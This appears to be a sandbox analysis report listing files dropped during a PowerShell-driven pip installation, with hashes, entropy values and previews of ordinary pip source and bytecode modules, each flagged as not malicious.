                                                                                                    Preview:........=.Cf.F..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.j:..................j<..................Z.e.j:..................j>..................Z...e.j@..................e!........Z"..e.jF..................d.........Z$..e.jF..................d.........Z%..e.jF..................d.e.jL..........................Z'd.e(d.e)f.d...Z*..G.d...d.e.........Z+..e.jX..................e+..........y.)......N)...List..Optional..Tuple)...BadCommand..InstallationError)...HiddenText..display_path..hide_url)...make_command)...AuthInfo..RemoteNotFoundError..RemoteNotValidError..RevOptions..VersionControl.(find_path_to_project_root_from_repo_root..vcsz(^git version (\d+)\.(\d+)(?:\.(\d+))?.*$z.^[a-fA-F0-9]{40}$a/...^. # Optional user, e.g. 'git@'. (\w+@)?. # Server, e.g. 'github.com'.. ([^/:]+):. # The server-side path. e.g. 'user/project.git'. Must start w
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7621
                                                                                                    Entropy (8bit):5.4049869747923625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:3vvr0FJal39yWi/G3P6FLCdLBC8QBW8UHoQBYWFvcEfG:370FJaWccCdlC8QfUHLBYevcb
                                                                                                    MD5:52256CBFFE1895E8213B8E221DC81E29
                                                                                                    SHA1:FFE2DDE21706C6BE6BE0389BB52A4F137CBBEBB0
                                                                                                    SHA-256:83DC6296C8A0F6516A2FBADACEBC9FEA61F0954EAC721E14BCA778F24EE34449
                                                                                                    SHA-512:A100705530BCA2F3677C2E6A73C6CE6F2D505EAA912548CC5099F28FDDB2615C8D308781C3684C4C73CFE033027930CADAAEB37B0C7C21C0387C190140FB7E3F
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.j,..................e.........Z...G.d...d.e.........Z...e.j4..................e...........y.)......N)...List..Optional..Tuple)...BadCommand..InstallationError)...HiddenText..display_path)...make_command)...path_to_url)...RevOptions..VersionControl.(find_path_to_project_root_from_repo_root..vcsc.....................F.......e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.e.....f.d...........Z.d.e.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.d.e.d.e.d.e.d.d.f.d...Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.e.....f...f.d...........Z...x.Z.S.)...Mercurial..hgz..hg..clone).z.hg+filez.hg+httpz.hg+httpsz.hg+sshz.hg+static-http..rev..returnc...........................d.|.....g.S.).Nz.--rev=..).r....s.... .gC:\Users\boadi\App
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12493
                                                                                                    Entropy (8bit):5.518292339291103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Db7UX973b0U61/C77L0RnG4nG+1iG5H5aDq+KdPMRhzd:Db7UX9jh77L0RnGD+19oG+KdPMB
                                                                                                    MD5:BEEA40197E00CB016751EE0FBEC0A253
                                                                                                    SHA1:ED39149E51537AC6FC1F3B3FB65F01C90EDC3719
                                                                                                    SHA-256:14975CEB8EF58F42C51601021F935D171D3C13E87D38DAB018E049BC1F08BE66
                                                                                                    SHA-512:B2D6029A05DA464C900C9D575AE07BFA7D850A7185F04AF69263973902CDC0A6E7C7E0BB8EF44152152B066947A61632219968019E73D0A6DEA12D699E96911F
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.-........................f.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.....e.j,..................e.........Z...e.j2..................d.........Z...e.j2..................d.........Z...e.j2..................d.........Z...e.j2..................d.........Z...G.d...d.e.........Z...e.j>..................e...........y.)......N)...List..Optional..Tuple)...HiddenText..display_path..is_console_interactive..is_installable_dir..split_auth_from_netloc)...CommandArgs..make_command)...AuthInfo..RemoteNotFoundError..RevOptions..VersionControl..vcsz.url="([^"]+)"z.committed-rev="(\d+)"z.\s*revision="(\d+)"z.<url>(.*)</url>c.............................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.e.....f.d...........Z.e.d.e.d.e.f.d...........Z.e.d.e.d.e.d.e.e.e.e.e.....e.e.....f.....f.....f...f.d...........Z.e.d.e.d.e.e.e.e.....e.f.....f...f.d...........Z.e.d.e.e.....d.e.e.....d.e.f.d...........Z.e.d.e.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29019
                                                                                                    Entropy (8bit):5.407049521906488
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0in+3bDTQgj3s0F2KDqv2ZjgBrfhIcBUz31MGl2:bqbnZAKDrhgBrfhIcypJg
                                                                                                    MD5:0CDECD42F3DFC72190B3624B01B544EF
                                                                                                    SHA1:34B991432FB0DE81047290BF69CA22B6EAA203EB
                                                                                                    SHA-256:469D5FF5235B414240A25B7800269201639969B38F2EF18B1BADE042BFDD8AF1
                                                                                                    SHA-512:8EF6B8692F70B63E44398F23D069C5C58BB42AA2731B6FAD673E8AE027F0139F8251B086B11161FFBDCC87DEF0087B21FD482886F463C13F709957848937B590
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.Y..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z ..d.d.l!m"Z"m#Z#m$Z$m%Z%..d.d.l&m'Z'..e.r.d.d.l.m(Z(..d.g.Z)..e.jT..................e+........Z,e.e.e-....e.e-....f.....Z.d.e-d.e/f.d...Z0..d d.e-d.e-d.e-d.e.e-....d.e-f.d...Z1d.e-d.e-d.e.e-....f.d...Z2..G.d...d.e3........Z4..G.d...d.e3........Z5..G.d...d.........Z6..G.d...d.........Z7..e7........Z8..G.d...d.........Z9y.)!z)Handles all VCS (version control) support.....N)...TYPE_CHECKING..Any..Dict..Iterable..Iterator..List..Mapping..Optional..Tuple..Type..Union)...SpinnerInterface)...BadCommand..InstallationError)...HiddenText..ask_path_exists..backup_dir..display_path..hide_url..hide_value..is_installable_dir..rmtree)...CommandArgs..call_subprocess..format_command_args..make_command)...get_url_scheme)...Literal..vcs..name..returnc.....................L.....t.........|.........}.|..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3519
                                                                                                    Entropy (8bit):4.499327086267654
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZmPMVZM4U1zIpidyCKXDqyoyKjKakIVvgOQ4TOSpc0wvXTpNchwF:ZmPMVzU1kpcyC1GhIxz9TObjTL3F
                                                                                                    MD5:6979F5F36DEB062F7105D00723A97792
                                                                                                    SHA1:44A7790A3F562475C1EC006CBBFCA10C5243DCBA
                                                                                                    SHA-256:8F4A229F47E91911DC0850B111CA4F090A0512F03E0CC2D42CA7463FC36FEFAA
                                                                                                    SHA-512:8C949BD62BD76C471E8FD99202A070C4513E65D7A189EEFA63395CAA8A08D67145A49AE5E9DAD05887082B08937F090D55B5F37D0F988FE15F5831C22A4EC30D
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.from typing import List, Optional, Tuple..from pip._internal.utils.misc import HiddenText, display_path.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs.versioncontrol import (. AuthInfo,. RemoteNotFoundError,. RevOptions,. VersionControl,. vcs,.)..logger = logging.getLogger(__name__)...class Bazaar(VersionControl):. name = "bzr". dirname = ".bzr". repo_name = "branch". schemes = (. "bzr+http",. "bzr+https",. "bzr+ssh",. "bzr+sftp",. "bzr+ftp",. "bzr+lp",. "bzr+file",. ).. @staticmethod. def get_base_rev_args(rev: str) -> List[str]:. return ["-r", rev].. def fetch_new(. self, dest: str, url: HiddenText, rev_options: RevOptions, verbosity: int. ) -> None:. rev_display = rev_options.to_display(). logger.info(. "Checking out %s%s to %s",. url,. re
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18121
                                                                                                    Entropy (8bit):4.402108087289438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WPx+iyCAZF6bWSBS6EDftgQRhsRir5TvBCyNhEiEls7IdaW6eTTP++2/ap+zu1VO:wHUF6C6EJs4TZC2HfeTTeA+zu7kQ+J
                                                                                                    MD5:5EC51DECD3CAAFC917F8E420288FB13C
                                                                                                    SHA1:8B619B071F349B2B977E86AA685B20CBFA344659
                                                                                                    SHA-256:09E2811899E5EAEB24BEF8E40145EB255C5B1C9AE94BF07FA727C57632F70917
                                                                                                    SHA-512:6BDCED247288DFA90C8FBA8F23892EE2203CBAA00DBB945E811829FEEAE45AB43AA8A053322902C19AE74A36177D474010ADF2FA648FDC19E3867B46637196E5
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.path.import pathlib.import re.import urllib.parse.import urllib.request.from typing import List, Optional, Tuple..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.utils.misc import HiddenText, display_path, hide_url.from pip._internal.utils.subprocess import make_command.from pip._internal.vcs.versioncontrol import (. AuthInfo,. RemoteNotFoundError,. RemoteNotValidError,. RevOptions,. VersionControl,. find_path_to_project_root_from_repo_root,. vcs,.)..urlsplit = urllib.parse.urlsplit.urlunsplit = urllib.parse.urlunsplit...logger = logging.getLogger(__name__)...GIT_VERSION_REGEX = re.compile(. r"^git version " # Prefix.. r"(\d+)" # Major.. r"\.(\d+)" # Dot, minor.. r"(?:\.(\d+))?" # Optional dot, patch.. r".*$" # Suffix, including any pre- and post-release segments we don't care about..)..HASH_REGEX = re.compile("^[a-fA-F0-9]{40}$")..# SCP (Secure copy protocol) shorthand. e.g. 'git@ex
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5249
                                                                                                    Entropy (8bit):4.39870404043357
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kdtO5xn1khyvDo0fuVMlR98epnT+amAMGEtQG:cO3nCU7/fWMl78exzMkG
                                                                                                    MD5:EB530B5A044A306794956925E8011D76
                                                                                                    SHA1:9F7531C4AB899404633DA9AB7DE6E0610DA47EC0
                                                                                                    SHA-256:A142CE8732765227BED3A775A2690BFBF19CEA6786694932A20BEA1BD642C8FB
                                                                                                    SHA-512:CCD2FF40E1217A4B5BF91883BA3ECD4F93A01A37E203E34C53548A9734AB5AF4003A586F46AACAF627DD0088A412E9C66D7D92213A143CC7E1A756E6C96F8F33
                                                                                                    Malicious:false
                                                                                                    Preview:import configparser.import logging.import os.from typing import List, Optional, Tuple..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.utils.misc import HiddenText, display_path.from pip._internal.utils.subprocess import make_command.from pip._internal.utils.urls import path_to_url.from pip._internal.vcs.versioncontrol import (. RevOptions,. VersionControl,. find_path_to_project_root_from_repo_root,. vcs,.)..logger = logging.getLogger(__name__)...class Mercurial(VersionControl):. name = "hg". dirname = ".hg". repo_name = "clone". schemes = (. "hg+file",. "hg+http",. "hg+https",. "hg+ssh",. "hg+static-http",. ).. @staticmethod. def get_base_rev_args(rev: str) -> List[str]:. return [f"--rev={rev}"].. def fetch_new(. self, dest: str, url: HiddenText, rev_options: RevOptions, verbosity: int. ) -> None:. rev_display = rev_options.to_display(). logger.in
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11729
                                                                                                    Entropy (8bit):4.427922742656393
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:s7+Ctf6S7zirZLMvNsYd6txSG0m8IC1+e:0ff6SuMlsys58ICz
                                                                                                    MD5:8E17210212AF36BABEE278E0040A42E9
                                                                                                    SHA1:3EDA4B853ED85B240D41EBDBD1CC242A0102B2D5
                                                                                                    SHA-256:BE166CF0BF93360817A8CD5B6E197E1696F11374EB201E93827C7C7E1DD2D871
                                                                                                    SHA-512:CB8F14D81F0DA4883C40A0849927F57DC260294C69DE5EC81EF82C07BE22D17E18D799E479473F8B25A05407692018850CD1E0FFEABCA4340977A562C5DE5B50
                                                                                                    Malicious:false
                                                                                                    Preview:import logging.import os.import re.from typing import List, Optional, Tuple..from pip._internal.utils.misc import (. HiddenText,. display_path,. is_console_interactive,. is_installable_dir,. split_auth_from_netloc,.).from pip._internal.utils.subprocess import CommandArgs, make_command.from pip._internal.vcs.versioncontrol import (. AuthInfo,. RemoteNotFoundError,. RevOptions,. VersionControl,. vcs,.)..logger = logging.getLogger(__name__).._svn_xml_url_re = re.compile('url="([^"]+)"')._svn_rev_re = re.compile(r'committed-rev="(\d+)"')._svn_info_xml_rev_re = re.compile(r'\s*revision="(\d+)"')._svn_info_xml_url_re = re.compile(r"<url>(.*)</url>")...class Subversion(VersionControl):. name = "svn". dirname = ".svn". repo_name = "checkout". schemes = ("svn+ssh", "svn+http", "svn+https", "svn+svn", "svn+file").. @classmethod. def should_add_vcs_url_prefix(cls, remote_url: str) -> bool:. return True.. @staticmethod. def get_base_rev_
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22787
                                                                                                    Entropy (8bit):4.412390369111583
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:biAY6U69w0OpUXhEg9ow06ZQFRobCqt0lOFB76:bi70OuxRWjqQFy+qt0lMk
                                                                                                    MD5:4050ABA66D648DBB1353881A27B6FC7B
                                                                                                    SHA1:B65AF453851FE273953A60B122CB2BE83441C3F6
                                                                                                    SHA-256:DDE223B4E318BCE639A8FE813182180D9DFBE424AE79CEA44840746CEA35712B
                                                                                                    SHA-512:FCC22CB85FB2FF5597A1730C93B7F788D06D14AD5E5B718A8EB3F70A453C2AC0728995804442266C484A37BF3B59231CE78778D56737901AF520D49EE3792E15
                                                                                                    Malicious:false
                                                                                                    Preview:"""Handles all VCS (version control) support"""..import logging.import os.import shutil.import sys.import urllib.parse.from typing import (. TYPE_CHECKING,. Any,. Dict,. Iterable,. Iterator,. List,. Mapping,. Optional,. Tuple,. Type,. Union,.)..from pip._internal.cli.spinners import SpinnerInterface.from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.utils.misc import (. HiddenText,. ask_path_exists,. backup_dir,. display_path,. hide_url,. hide_value,. is_installable_dir,. rmtree,.).from pip._internal.utils.subprocess import (. CommandArgs,. call_subprocess,. format_command_args,. make_command,.).from pip._internal.utils.urls import get_url_scheme..if TYPE_CHECKING:. # Literal was introduced in Python 3.8.. #. # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.. from typing import Literal...__all__ = ["vcs"]...logger = logging.getLogger(__name__)..AuthI
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11801
                                                                                                    Entropy (8bit):4.445807799537282
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:rbf8kBwT58TRKeTRKOSXx7lXZVr7uNX6CzCMHzmYAd8ljgHb5hFC0FiS19FdLT1L:vUTcf8B7UNX6CfaRzjTc/A
                                                                                                    MD5:6D538A688C4B4A1B4C1892D5A6EB727E
                                                                                                    SHA1:7FF104F4E1DD97395031964352FD11292541EC2E
                                                                                                    SHA-256:A934F3415F05E9BD6336C14275AD534500BC27B80AFA6EE2B913602A8EC38FAF
                                                                                                    SHA-512:9B6EFEDF74E9EE42445D23F33A6A6CFB0A8427152A853C4DD0337267F4DB7B028B27EDFE9AFFC208D0F1A1674A601895485E38AE82757906D528F0D63AD02D56
                                                                                                    Malicious:false
                                                                                                    Preview:"""Orchestrator for building wheels from InstallRequirements.."""..import logging.import os.path.import re.import shutil.from typing import Iterable, List, Optional, Tuple..from pip._vendor.packaging.utils import canonicalize_name, canonicalize_version.from pip._vendor.packaging.version import InvalidVersion, Version..from pip._internal.cache import WheelCache.from pip._internal.exceptions import InvalidWheelFilename, UnsupportedWheel.from pip._internal.metadata import FilesystemWheel, get_wheel_distribution.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.operations.build.wheel import build_wheel_pep517.from pip._internal.operations.build.wheel_editable import build_wheel_editable.from pip._internal.operations.build.wheel_legacy import build_wheel_legacy.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import ensure_dir, hash_file.from
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4993
                                                                                                    Entropy (8bit):4.706048155714618
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:OrHde0hpbiPzsYl1tQdWftXBaIrpOnnd7RbQ/bjXOVSKYg9QMAq8BcQZwycyP:Orr5inPQdIRBrpyMP
                                                                                                    MD5:E757A0BEA2E10105518C3F9B5E1DA457
                                                                                                    SHA1:D18AD681EBF3B0D236945512222A28AF4EAD58F7
                                                                                                    SHA-256:539D4D3F05DD03EC173A200D2109DC62370CA7AB7181E38BE671F192C25EC9AB
                                                                                                    SHA-512:87CAB1B6AD7259234C88357ED7A98297C9B440287BEDB7B25B9AF86908A33EB214CE088D7F6A4E13C8E75116AA3E0490DC27EB74992686E456EE251269E604F3
                                                                                                    Malicious:false
                                                                                                    Preview:""".pip._vendor is for vendoring dependencies of pip to prevent needing pip to.depend on something external...Files inside of pip._vendor should be considered immutable and should only be.updated to versions from upstream..""".from __future__ import absolute_import..import glob.import os.path.import sys..# Downstream redistributors which have debundled our dependencies should also.# patch this value to be true. This will trigger the additional patching.# to cause things like "six" to be available as pip..DEBUNDLED = False..# By default, look in this directory for a bunch of .whl files which we will.# add to the beginning of sys.path before attempting to import anything. This.# is done to support downstream re-distributors like Debian and Fedora who.# wish to create their own Wheels for our dependencies to aid in debundling..WHEEL_DIR = os.path.abspath(os.path.dirname(__file__))...# Define a small helper function to alias our vendored modules to the real ones.# if the vendored ones do n
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4702
                                                                                                    Entropy (8bit):5.436774829292428
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:wBDCa5RDq0Cmhxz+5l5v75U1y/uzrGzBWJxML58M6LzWsUahOeSt:wBDrzCmhpqGOeSt
                                                                                                    MD5:73023FE5C0B123E08659E59DB89382A0
                                                                                                    SHA1:10FC04E51E41FABE8B581A8A75BB229603FB3239
                                                                                                    SHA-256:C58D11257D607A6F78F278E0C630C82C257244F351E1BDA1F2713A5752F5F476
                                                                                                    SHA-512:EB8AF4BDD6BB6AB8FDBEB51C1DB869D735722CE466ECCC70BBD3D86A3AD6A087139483ED1678EE7330E8C72C7320890041B2310E0A3FCA40C479C30976EFD08A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.e.j...................j...................e.j...................j...................e.................Z.d...Z.e...r'..e.j...................e.j...................j...................e.d.................e.j...................z...e.j...................d.d.....e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d.............e.d ............e.d!............e.d"............e.d#............e.d$............e.d%............e.d&............e.d'............e.d(............e.d)............e.d*............e.d+............e.d,............e.d-............e.d.............e.d/..........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):41279
                                                                                                    Entropy (8bit):5.5514286955584815
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:guAEeI3FfH+2cNDDMVyJewpZ68elBVgsfmCfS+/xIQu6kVWNt6jSQ:guAEtFfHQNDD9Jewp0llBVHfmCfSsGb9
                                                                                                    MD5:42D882A719550AA5B1143D33CB5F5ABC
                                                                                                    SHA1:B65EB15D6F360382BB4F31332E9DECF409295D9F
                                                                                                    SHA-256:423558902E338A447C703C73655D885A051582752E47A7B020088EEED4951CF5
                                                                                                    SHA-512:F6C7942055397A0DBA8E83D17F3D8439748A354F9679289CB1038CF198BFFFEB49651EBD236FCAD5F7C3360823A61443DB2C603FBF0D48F60904C4644EA46261
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................N.....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j...................d.....d.k(..Z.e.j...................d.....d.k(..Z.e.j...................d.d...d.k\..Z.e.r.e.f.Z.e.f.Z.e.f.Z.e.Z.e.Z.e.j...................Z.n_e.f.Z.e.e.f.Z.e.e.j6..................f.Z.e.Z.e.Z.e.j:..................j=..................d.........r...e.d.........Z.n"..G.d...d.e.........Z ....e!..e ....................e.d.........Z.[ e.r.d.d.l#m$Z$..n.d.Z$d...Z%d...Z&..G.d...d.e.........Z'..G.d...d.e'........Z(..G.d...d.e.jR..........................Z*..G.d...d.e'........Z+..G.d...d.e.........Z,..e,e-........Z...G.d...d.e*........Z/g...e+d.d.d.d.............e+d d!d"d#d ............e+d$d!d!d%d$............e+d&d'd"d(d&............e+d)d'd*............e+d+d!d"d,d+............e+d-d.d.d/d-............e+d0d.d.d-d0............e+d1d2d3............e+d4d'd"d5d4............e+d6d'e.r.d7n.d8d9............e+d:d'd;............e+d<d=d>d?............e+d.d.d.............e+d@d@dA..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):122059
                                                                                                    Entropy (8bit):5.316132166669628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:h7cilam7YX256nAeW9pKgpGY6SIlSkHsIMNitc8F9g1plMmdB/qyAEi5fPwpwqc/:hgOZc25znKiGY6SPkH7MWPUPAEQqcg3A
                                                                                                    MD5:92F827C49423BE9DF446CD44E81BF902
                                                                                                    SHA1:713A0CC2E70DA0A6C4996688E000D1DA0EDED405
                                                                                                    SHA-256:45B80D9145D098442FA52626123702293E6C2FA4684AB468AEBE7E052F90A4BE
                                                                                                    SHA-512:43BF2484BA30903678280C59E7816D2588E58B620A8EEC7BE384F4687E28C7795A0B5F3F5355E9E81694BB714E79EA4E289D9A4B1AE872B3B97F365F30FD1664
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.Z.e.Z...G.d...d.........Z...e.........Z.e.f.d...Z.e.j$..................d.k\..r.d...Z.n.e.j$..................d.k\..r.d...Z.n.d...Z.d.d...Z.e.j*..................Z...e.j,..................d.........Z...e.j,..................d.........Z...e.j,..................d.........Z...e.j,..................d.d...........Z...e.j,..................d.d...........Z.e.j$..................d.k\..r.d.d.l.m.Z...n...G.d...d.e.........Z...G.d...d.e...........Z.e.j<..................Z...G.d...d.e.j>..................d...........Z ..e!e.d.........r.e.j$..................d.d...d k\..r.e.jD..................Z"n...G.d!..d"e d...........Z#..e#d.d#.$........Z"e.j$..................d.k\..r.e.jH..................Z$n.d%..Z$d&..Z%e.j$..................d'k\..r.e.jL..................Z&n3d(..Z'd)..Z(..G.d*..d+e.jR..................d...........Z*..G.d,..d-e d...........Z+..e+d..$........Z&e.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):676
                                                                                                    Entropy (8bit):4.852635062396944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:8l+O+cF6xDIBGxuqbe2UHSKdD61zdZ1rrdN81ayRkvUHCvzbuWoG2fQWu:VOMceuBDRdDqzdn3dS1iMHRrQWu
                                                                                                    MD5:D05C6BEC60B3EC01D5623F79F6AA6BDD
                                                                                                    SHA1:48097D9D6D51F957B78102C7F9AE113B55821C0E
                                                                                                    SHA-256:72D1DA80C8505EEBD00DD9B84E2AD9AF00CE4F91FCA0134026ACDD288EACA2F9
                                                                                                    SHA-512:16E8E920E74F5594FAB99556B076E1837A7C8501E280F0B3FADF781F042A43A086C805A2139E90644A392B03F7522703353506DCAA1C1B89D177D2909681F5C1
                                                                                                    Malicious:false
                                                                                                    Preview:# SPDX-FileCopyrightText: 2015 Eric Larson.#.# SPDX-License-Identifier: Apache-2.0.."""CacheControl import Interface...Make it easy to import from cachecontrol without long namespaces..""".__author__ = "Eric Larson".__email__ = "eric@ionrock.org".__version__ = "0.13.1"..from pip._vendor.cachecontrol.adapter import CacheControlAdapter.from pip._vendor.cachecontrol.controller import CacheController.from pip._vendor.cachecontrol.wrapper import CacheControl..__all__ = [. "__author__",. "__email__",. "__version__",. "CacheControlAdapter",. "CacheController",. "CacheControl",.]..import logging..logging.getLogger(__name__).addHandler(logging.NullHandler()).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):912
                                                                                                    Entropy (8bit):5.401821985495942
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:XClmTEceuP1mH7aOuD1ADZS3/bd9fcE1p:XC+E5HGpmZSDdtcK
                                                                                                    MD5:A7BADB4F7BF552A78C412DD59359FDC0
                                                                                                    SHA1:6771FD38F92CFEB38A88ECB414DB49AB311C97B8
                                                                                                    SHA-256:7A9F2F8AD990E00BE103D7E497C8E05ED7804C1F9D86CEBBD4C6DD108D529877
                                                                                                    SHA-512:D025A0DA8E2CFEE787A4F8F35ACC97433293603A549282E5D8781D7A1F16EA6F575F35C4FF51D957132CD0667355A8B4932D870238730A6A6DDC214F9ADE3A1A
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z...e.j...................e.........j.....................e.j.....................................y.).zbCacheControl import Interface...Make it easy to import from cachecontrol without long namespaces..z.Eric Larsonz.eric@ionrock.orgz.0.13.1.....)...CacheControlAdapter)...CacheController)...CacheControl)...__author__..__email__..__version__r....r....r....N)...__doc__r....r....r..... pip._vendor.cachecontrol.adapterr.....#pip._vendor.cachecontrol.controllerr..... pip._vendor.cachecontrol.wrapperr......__all__..logging..getLogger..__name__..addHandler..NullHandler........mC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/cachecontrol/__init__.py..<module>r........sW................................@..?..9........................(.....&..&.':.w.':.':.'<..=r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2656
                                                                                                    Entropy (8bit):5.016947828560067
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:tzLWaVhV932QtJspVHbX1TxcXGDe2XyBn/YiZH:tzqU9m9HbXngWEYih
                                                                                                    MD5:EADA0DF25978F8D59D4499303EAA6BBC
                                                                                                    SHA1:8FEAE72BAF08B1CB1E86F8A9C701578B44ABA210
                                                                                                    SHA-256:B41FF6D46494216765DD077BEA20850F8AA36578AA54B8EA25FFA4F74B839FFD
                                                                                                    SHA-512:12C1ACF30C49E19AA5DB07A1E25CBD4CD0401A2DBECC329F56BB7F713043DF060B92BFEC98E5F42D61A2AA1D7D123EC3E616F1DEFCA00C7322B0EC777295BD74
                                                                                                    Malicious:false
